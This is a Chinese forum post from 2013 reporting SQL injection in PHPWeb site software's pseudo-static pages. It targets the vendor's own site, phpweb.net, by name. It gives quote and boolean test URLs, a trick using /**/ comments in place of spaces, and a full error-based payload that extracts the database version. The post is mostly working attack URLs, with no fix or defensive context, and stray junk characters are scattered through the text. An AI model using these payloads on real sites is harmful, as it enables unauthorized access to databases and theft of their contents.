phpweb所有的整站程序伪静态页面都存在sql注入
- K" t* ^6 V. V. z8 ]/ x: ?! I2 R" K2 C2 q# D
主站:http://phpweb.net/4 L) H8 n% c1 j
加’检测:
) \/ M9 A ^1 X/ s2 E$ ]
' i& F) k+ w2 t9 n+ {: H2 v0 nhttp://www.phpweb.net/down/html/?772′.html. ]0 v$ T; d' _/ g& ?' v y
. Q5 K6 E/ n% I0 b/ W9 c5 C出错9 c" `; @# s5 Q. v. Q, s! j& M
存在注入。
- z7 ` _2 A0 \8 T不能用空格,只能用/*罗7 j! l' q. i: g4 o9 c8 o+ U4 ]
http://www.phpweb.net/page/html/?56′/**/and/**/1=1/*.html 正常
) J. S+ o; o1 o+ U8 ] 5 `$ V# h0 h+ d1 ?( v: K
http://www.phpweb.net/page/html/?56′/**/and/**/1=2/*.html 出错.
6 Q# f4 ?" O" N9 T" e. z4 t c3 x爆数据库版本:
) u0 s1 f2 g) I1 D3 u7 k ; k& S, y! u' e8 M% T
?$ I1 z7 ^2 g& ?) e5 G, \$ h
1
5 {) d2 x* _. U- Ahttp://www.phpweb.net/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html
O7 Q$ K4 V4 Q更新日期: 2013-01-03 13:39:50 . D. O5 C0 Y) }# J" ?
|
发表于 2013-1-4 19:46:42
收藏
支持
反对